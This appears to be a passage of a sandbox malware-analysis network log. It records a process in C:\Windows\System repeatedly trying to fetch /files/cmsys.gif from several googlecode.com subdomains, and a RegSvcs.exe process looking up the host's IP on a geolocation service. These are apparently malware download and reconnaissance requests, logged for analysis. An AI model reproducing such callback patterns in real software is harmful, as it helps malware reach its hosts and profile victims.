                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:51 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.137142897 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.137181997 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    116192.168.2.56078164.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.373943090 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.305845976 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:55 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.305901051 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    117192.168.2.560782108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:55.523170948 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.445482016 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:56 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.445511103 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    118192.168.2.560783142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.805192947 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.726351023 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:57 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.726416111 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    119192.168.2.56078564.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.059391975 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.989767075 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:12:00 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.989830017 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    120192.168.2.560786108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:01.233608007 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:02.143970966 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:12:02 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:02.144040108 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.2.549706188.114.96.34435568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:02 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    2024-10-29 12:08:02 UTC884INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:02 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Age: 11192
                                                                                                                                                                                                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=brzrjaF0bJgnPBpCXiGyEx8%2BytVo9W9Tr32iPnM6JKD3w612t5b1S7YEvwdD%2FrliNMJR0dGsLuXC5qbGZ9HVD3UXzPYQviZy3uOBynYoFCC%2FJ9NAsYWXR4C4vZKNuollFdLwFTyw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8da30c771f81474c-DFW
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1858&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1624228&cwnd=32&unsent_bytes=0&cid=d31f0d1177d5d1f1&ts=715&x=0"
